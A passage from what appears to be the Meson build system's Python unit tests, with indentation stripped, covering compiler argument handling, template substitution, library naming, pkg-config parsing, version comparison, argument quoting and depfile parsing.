cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
